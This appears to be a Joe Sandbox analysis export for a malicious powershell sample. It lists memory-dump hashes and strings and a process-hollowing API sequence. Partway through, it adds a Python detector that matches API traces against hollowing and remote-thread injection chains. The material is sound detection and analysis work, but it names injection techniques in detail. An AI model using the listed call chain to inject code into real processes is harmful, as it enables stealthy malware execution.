                                                                • Opcode ID: 74dba3c54dfda0e603612f09d2ffb49907ea28b52ea50413fe67cf24b5380c85
                                                                • Instruction ID: c11f5a4905caa40af8a383a11f60089171c16d1df41730e896ae492d1901890a
                                                                • Opcode Fuzzy Hash: 74dba3c54dfda0e603612f09d2ffb49907ea28b52ea50413fe67cf24b5380c85
                                                                • Instruction Fuzzy Hash: 6A41CCB1B00258CBCB15E76C9561ABEBBF6DFD2710B14856BC7018F755CA32C941C3A2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2060426178.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_4230000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee03cfd3e9b304f915b0703a416450319c5ada766d123d3a45da04c7ca86a0c4
                                                                • Instruction ID: de43fe0b5ff9a8ea209ed303e73f49faf6a3baf0b906cb9f3bf154affe10882f
                                                                • Opcode Fuzzy Hash: ee03cfd3e9b304f915b0703a416450319c5ada766d123d3a45da04c7ca86a0c4
                                                                • Instruction Fuzzy Hash: E341877490E3D59FC703DB3C886199A7FB4AF47210B0944DBC094CF2A3D629E849CBA5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2060426178.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_4230000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d2fa37113a9efe1d5ffd4bc7d2421bc581048fe99223a8b15edb9f6064d31ce8
                                                                • Instruction ID: 5db86e840387da60b14cee50833fb993d26f1c622761f947f53f42832f9bccc0
                                                                • Opcode Fuzzy Hash: d2fa37113a9efe1d5ffd4bc7d2421bc581048fe99223a8b15edb9f6064d31ce8
                                                                • Instruction Fuzzy Hash: BC4146B4A10505DFCB09CF59C198AAEFBB5FF48311B2185A9D815AB364C732FC91CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2060426178.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_4230000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37ec607d5a2cd468c98168bf3895434bfe544042fdf0a675dfce4ebc68e7f387
                                                                • Instruction ID: 973af9ceb1d50e653c524f6ddf568be2fabcd83138ea865f9654d04c8a7f8a25
                                                                • Opcode Fuzzy Hash: 37ec607d5a2cd468c98168bf3895434bfe544042fdf0a675dfce4ebc68e7f387
                                                                • Instruction Fuzzy Hash: E3211AB4A042499FCB01DFA8D5909AEBBF1FF8A310B158599D845EB362C335EC45CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2059952995.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_292d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b3f619ba4cd9859709a333f60ea2d120352b6dbf4025b509f8c5cc868a19d7d
                                                                • Instruction ID: 1556e55ce923a14a2ae7284705b12a640447de93a9f384f57c626eef7c3b4f92
                                                                • Opcode Fuzzy Hash: 1b3f619ba4cd9859709a333f60ea2d120352b6dbf4025b509f8c5cc868a19d7d
                                                                • Instruction Fuzzy Hash: C4012B31045310DAE7208E15CD84B67FFDCEF45324F18C429ED484B25AC3799849C6F1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2059952995.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_292d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a9cade3b8dcc0d4b295e9860f041a1464957d9f76c880af545e7987b97a89ed
                                                                • Instruction ID: 8c596acb02706848de6d9d0933aeb7f0507b092018d0cc353596f4e834c1b8e3
                                                                • Opcode Fuzzy Hash: 7a9cade3b8dcc0d4b295e9860f041a1464957d9f76c880af545e7987b97a89ed
                                                                • Instruction Fuzzy Hash: E401527104E3D09ED7128B258C94756BFB8DF47224F1DC1DBD9888F1A7C2695849C772
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-656377573
                                                                • Opcode ID: 6373ac83ff44f010ece424e19dc65609ac1a64cea47aaeb67f41e7324dbc22eb
                                                                • Instruction ID: 36c03abb5eec6434e23e954d14abdfe31107506b8e55c9cbe06af7aa9f72c348
                                                                • Opcode Fuzzy Hash: 6373ac83ff44f010ece424e19dc65609ac1a64cea47aaeb67f41e7324dbc22eb
                                                                • Instruction Fuzzy Hash: 36518A7170434ADFDB644B698810B6BBFF6BF82711F28866BE644CB381CA71C840C3A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$4']q$4']q
                                                                • API String ID: 0-1785108022
                                                                • Opcode ID: 2cd6ee0eec6ef984642b7dcef51b91f76d31c5f6c4093e4d995807cf5ea9cc38
                                                                • Instruction ID: 24a650dc4ab0c3981be2fa95cd93886118c2acf2350afc2fa497837f486ad83f
                                                                • Opcode Fuzzy Hash: 2cd6ee0eec6ef984642b7dcef51b91f76d31c5f6c4093e4d995807cf5ea9cc38
                                                                • Instruction Fuzzy Hash: 81D156B170435ADFCB158B6888107AEBFE6AFD2721F14817BD605CF682DB318985C7A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q
                                                                • API String ID: 0-858218434
                                                                • Opcode ID: 0e938935ab7c2490f57a03d686bfe1811570db1f974e91084b6d59370067e903
                                                                • Instruction ID: 386e859716afeb8a61d41ceb417f319be1158b0930beee9c681f4cfa47f7d0d0
                                                                • Opcode Fuzzy Hash: 0e938935ab7c2490f57a03d686bfe1811570db1f974e91084b6d59370067e903
                                                                • Instruction Fuzzy Hash: C02138B13143165BDBB8556ECC41B2BFBDAAFC1B20F64862ADA45CB781DD36C8418361
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                • API String ID: 0-978391646
                                                                • Opcode ID: d796f9eff4ba6153d0b25e1097d3dd677d10da17ee1fe0ad086e6f6024bf29fe
                                                                • Instruction ID: e856fea60d832167f0041d922becfd8f36a5333e864d6958575afaab4d31b4aa
                                                                • Opcode Fuzzy Hash: d796f9eff4ba6153d0b25e1097d3dd677d10da17ee1fe0ad086e6f6024bf29fe
                                                                • Instruction Fuzzy Hash: D6F022713083129FC72A012D2C709BA6FEE9FC2E20329469BD541DB696CE264D4683E7
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2352618519.000000000345D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0345D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_345d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59eda168685bca67631be4cd8c7f76d800994e898fcff93e7a4a67c3543e3790
                                                                • Instruction ID: 77cf049f07f2e05650cbcb802adcd61cd68b81dee17ebba994cf3ece0e921b9b
                                                                • Opcode Fuzzy Hash: 59eda168685bca67631be4cd8c7f76d800994e898fcff93e7a4a67c3543e3790
                                                                • Instruction Fuzzy Hash: 4B01696280D3C49FD7128B258D84652BFA8EF43624F0D84DBEC888F2A3C2695C45C776
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2352618519.000000000345D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0345D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_345d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c7d50ce56f974f11967ad3902aff425c51c7630664690cf2a9cb1af4a32d6d66
                                                                • Instruction ID: 6895204963de7b531b12e7f27049a83fb96269ff877e8ece5dd54cc53834a405
                                                                • Opcode Fuzzy Hash: c7d50ce56f974f11967ad3902aff425c51c7630664690cf2a9cb1af4a32d6d66
                                                                • Instruction Fuzzy Hash: A4018472C053449AD720CA15CD84B67BF9CEF46728F18C46AFD585E247C2799842C6B9
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2353986134.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_4d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de3058ee5617e1b82d8747034bb904958f99e4200fffa83312dc504914eefb81
                                                                • Instruction ID: b8ff22468a1fbcc31f7d2dffbc495f5cb30179222646cab36457f03a26894755
                                                                • Opcode Fuzzy Hash: de3058ee5617e1b82d8747034bb904958f99e4200fffa83312dc504914eefb81
                                                                • Instruction Fuzzy Hash: 57F0D435A001199FCB15CF9DD990AEEF7B1FF88324F208159E515A72A1C736EC62CB60

                                                                Execution Graph

                                                                Execution Coverage: 8.6%
                                                                Dynamic/Decrypted Code Coverage: 0%
                                                                Signature Coverage: 0%
                                                                Total number of Nodes: 21
                                                                Total number of Limit Nodes: 4
                                                                execution_graph (rendered graph not recoverable as text). API calls on the graph, with their call-site nodes: CreateProcessW (29fcd7b), VirtualAllocEx (29fb9eb), WriteProcessMemory (29fd170), Wow64SetThreadContext (29fcfac), ResumeThread (29fc258). Taken together this is the API set characteristic of process hollowing: a child process is created, memory is allocated in it and a payload written there, the primary thread's context is redirected with Wow64SetThreadContext, and the thread is resumed. The graph does not record the order in which the calls were made.
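The execution graph above names five API calls: CreateProcessW, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread. As an added example, not part of the Joe Sandbox report, the Python below matches an ordered API-call trace against that process-hollowing chain and against a CreateRemoteThread-style injection chain, so that the same check works on any sandbox or ETW API log. The sample trace is constructed: its API names and call-site addresses are taken from the graph's nodes, but the call order is an assumption because the graph records none; the alternative NT-layer API names in the pattern table are well-known equivalents, not something the report shows.

```python
"""Match an ordered API-call trace against known process-injection chains.

Added example; not part of the sandbox report. The chain tables encode
well-known Win32/NT API sequences; the sample traces are constructed.
"""
from typing import Dict, List, Optional, Sequence, Set, Tuple

ApiCall = Tuple[int, str]  # (call-site address, API name)

# Constructed sample: API names and call-site addresses come from the
# execution-graph nodes above; the ORDER is assumed, the graph records none.
SAMPLE_TRACE: List[ApiCall] = [
    (0x29FCD7B, "CreateProcessW"),
    (0x29FB9EB, "VirtualAllocEx"),
    (0x29FD170, "WriteProcessMemory"),
    (0x29FCFAC, "Wow64SetThreadContext"),
    (0x29FC258, "ResumeThread"),
]

# Constructed counter-example: same APIs, but the thread is resumed before
# the payload is written, so the hollowing chain never completes.
REORDERED_TRACE: List[ApiCall] = [
    (0x29FCD7B, "CreateProcessW"),
    (0x29FB9EB, "VirtualAllocEx"),
    (0x29FC258, "ResumeThread"),
    (0x29FD170, "WriteProcessMemory"),
    (0x29FCFAC, "Wow64SetThreadContext"),
]

# Each chain is an ordered list of steps; a step is the set of API names that
# satisfy it (the Win32 call and its NT-layer equivalents). Steps must occur
# in order but need not be adjacent, so unrelated calls in between are fine.
CHAINS: Dict[str, List[Set[str]]] = {
    "process_hollowing": [
        {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
        {"ResumeThread", "NtResumeThread"},
    ],
    "remote_thread_injection": [
        {"OpenProcess", "CreateProcessW", "CreateProcessA"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread"},
    ],
}


def find_chain(trace: Sequence[ApiCall],
               steps: Sequence[Set[str]]) -> Optional[List[ApiCall]]:
    """Greedy ordered-subsequence match: returns the matched calls or None."""
    matched: List[ApiCall] = []
    step = 0
    for call in trace:
        if step == len(steps):
            break
        if call[1] in steps[step]:
            matched.append(call)
            step += 1
    return matched if step == len(steps) else None


def classify(trace: Sequence[ApiCall]) -> Dict[str, List[ApiCall]]:
    """Return every chain the trace completes, with the calls that matched."""
    hits: Dict[str, List[ApiCall]] = {}
    for name, steps in CHAINS.items():
        matched = find_chain(trace, steps)
        if matched is not None:
            hits[name] = matched
    return hits


if __name__ == "__main__":
    for label, trace in (("sample", SAMPLE_TRACE), ("reordered", REORDERED_TRACE)):
        hits = classify(trace)
        if not hits:
            print(f"{label}: no injection chain completed")
        for name, calls in hits.items():
            chain = " -> ".join(f"{api}@{addr:x}" for addr, api in calls)
            print(f"{label}: {name}: {chain}")
```

Order alone is a weak signal: debuggers, installers and some AV products make the same calls legitimately. A production rule should also require that CreateProcessW was called with CREATE_SUSPENDED (dwCreationFlags bit 0x4) and that the handle passed to VirtualAllocEx and WriteProcessMemory is the new child's, which this report's graph does not expose but most API-logging sources do.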

                                                                Control-flow Graph

                                                                control_flow_graph: function at 6fa18b0 (entry block 6fa18b0-6fa18d3, return block 6fa1aae-6fa1ac6); the basic-block graph and its executed/not-executed colouring are not recoverable from the text rendering.
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                • API String ID: 0-2353078639
                                                                • Opcode ID: 8ca7130df9ac106e65ec198676bc0312d1570b2be5cbe2000d84fa459d2a091c
                                                                • Instruction ID: 94353e8842c80a1294b0ca884f621583fc190794e3d13820ffc8bf90d1856a45
                                                                • Opcode Fuzzy Hash: 8ca7130df9ac106e65ec198676bc0312d1570b2be5cbe2000d84fa459d2a091c
                                                                • Instruction Fuzzy Hash: 0D416C71F043098FDBA4CA39851077AB7EAAF85650F168076D851CF259DB31C948C7A1

                                                                Control-flow Graph

                                                                control_flow_graph: function at 6fa21e0 (entry block 6fa21e0-6fa2206, return block 6fa23b2-6fa23d2); the basic-block graph and its executed/not-executed colouring are not recoverable from the text rendering.
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                • API String ID: 0-2353078639

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$$]q$$]q
                                                                • API String ID: 0-3019551829

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$$]q$$]q
                                                                • API String ID: 0-3019551829

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o]q$(o]q
                                                                • API String ID: 0-1858875562

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q
                                                                • API String ID: 0-3120983240

                                                                APIs
                                                                • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 029FCE44
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0

                                                                APIs
                                                                • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 029FCE44
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0

                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 029FD19C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0

                                                                APIs
                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 029FD19C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0

                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 029FCFCB
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0

                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 029FCFCB
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q
                                                                • API String ID: 0-1007455737
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q
                                                                • API String ID: 0-1007455737
                                                                • Opcode ID: 662da16a955221b0633be1f8647f30d293f3d26f93fa74548034c400eb59321a
                                                                • Instruction ID: 4c0426647290fda1e9627994d5b1f3352b98a8e3d25ce3c8e46c6885c1d54783
                                                                • Opcode Fuzzy Hash: 662da16a955221b0633be1f8647f30d293f3d26f93fa74548034c400eb59321a
                                                                • Instruction Fuzzy Hash: 8D3193B0F04305DFE765CF18D990A76BBAAFF85618B18C59AE8498B252CF31DC42C790
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o]q
                                                                • API String ID: 0-794736227
                                                                • Opcode ID: b276a7e526eeedd04d4a0f24ad078ac014c742b83262120db126ab8c809e124b
                                                                • Instruction ID: e6b4db0f4c128e5e0def77201d60aa4394c799cc701df8d58fbc3e2f4be68347
                                                                • Opcode Fuzzy Hash: b276a7e526eeedd04d4a0f24ad078ac014c742b83262120db126ab8c809e124b
                                                                • Instruction Fuzzy Hash: BE3180B0F04305DFEBB8CF58C944B6AB7B6BB48711F0C8165E4148B194C771D680CBA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q
                                                                • API String ID: 0-1259897404
                                                                • Opcode ID: 6288e12bd591a36eab8457d76ce338632202d228d1978e948d65eb001e8e4277
                                                                • Instruction ID: 4550649c37b0ca1aebaa13504c8d681b7b3650ddd4476fe0e244daf897f51c3c
                                                                • Opcode Fuzzy Hash: 6288e12bd591a36eab8457d76ce338632202d228d1978e948d65eb001e8e4277
                                                                • Instruction Fuzzy Hash: C42180B1F02305CFDBA4DF69C554B6A77E6BF85250F1D8066D4088B351DB34DA81CB91
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 09f467d213d92a482ea6fe67c9c69dd76fc24af2e9f19fb422b4f49a745faac7
                                                                • Instruction ID: f503668399719642e607f163757099281e894b2d627505426903a218aec82bed
                                                                • Opcode Fuzzy Hash: 09f467d213d92a482ea6fe67c9c69dd76fc24af2e9f19fb422b4f49a745faac7
                                                                • Instruction Fuzzy Hash: B401F1306483C42FD76623340D21B6E3EE6AF86B04F54808AF946DF2E7C8758E448376
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2233923742.00000000026DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026DD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_26dd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 73055fc5084aa72274aa563a0d179beb677ef629536fccf89d80c722910160f6
                                                                • Instruction ID: 55fcd1cc54d247669ec32e1f3d9f90c52b1510c568372ee4fe8a8b84774790d2
                                                                • Opcode Fuzzy Hash: 73055fc5084aa72274aa563a0d179beb677ef629536fccf89d80c722910160f6
                                                                • Instruction Fuzzy Hash: A901807240D3C49FD7169B258C84752BFB8EF43224F4985DBE8888F293C2695C45C771
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2233923742.00000000026DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026DD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_26dd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7b4eb4c99d8b0a4eba796c75d40f9079f6174184c808bd00450ad62a741fd222
                                                                • Instruction ID: d9a3433d7a1ca1cd17c28224e44cb51c7d0b20ccb8c2df5a91ff3acbec11cd01
                                                                • Opcode Fuzzy Hash: 7b4eb4c99d8b0a4eba796c75d40f9079f6174184c808bd00450ad62a741fd222
                                                                • Instruction Fuzzy Hash: EA012B32804388AEE720AE15CD84B67BF9CEFC5324F58C52AED480B346C3799842C6F1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 156f1ccd2a1886676740c93ca643736098c4df7e4b912c976c60b8446678ab6d
                                                                • Instruction ID: 9429681fabd1ab5a58ffd52ff0d9c970335bbf822d2d343a65b387edcecfe069
                                                                • Opcode Fuzzy Hash: 156f1ccd2a1886676740c93ca643736098c4df7e4b912c976c60b8446678ab6d
                                                                • Instruction Fuzzy Hash: C2F02270B403487BDAA466394802B2E39DAAFC5B04F908008B6069F3C5DDB69D8083B6
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 519372a3ea2283ebf2c4ccbeed549ae98b214d7902e6a8115673e04f9f91a7fe
                                                                • Instruction ID: bc895b863c1db39fe27ee5465758cc958a9d475527f671c1bedbc2f19226daa1
                                                                • Opcode Fuzzy Hash: 519372a3ea2283ebf2c4ccbeed549ae98b214d7902e6a8115673e04f9f91a7fe
                                                                • Instruction Fuzzy Hash: 12F0AFA564E3C05FD7478734AD204A2BF765E8710831A86C7D085CF1A3C9128D4AC7A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xaq$$]q
                                                                • API String ID: 0-1280934391
                                                                • Opcode ID: 76225cb48fc4e7d1273dd44a892b01794e71c1e21ae017be4705aafe7ef3ea9b
                                                                • Instruction ID: 4739bd45ebc855e615cbafbc29a4bf32de49da75a6f6295cf928ad87b92a59de
                                                                • Opcode Fuzzy Hash: 76225cb48fc4e7d1273dd44a892b01794e71c1e21ae017be4705aafe7ef3ea9b
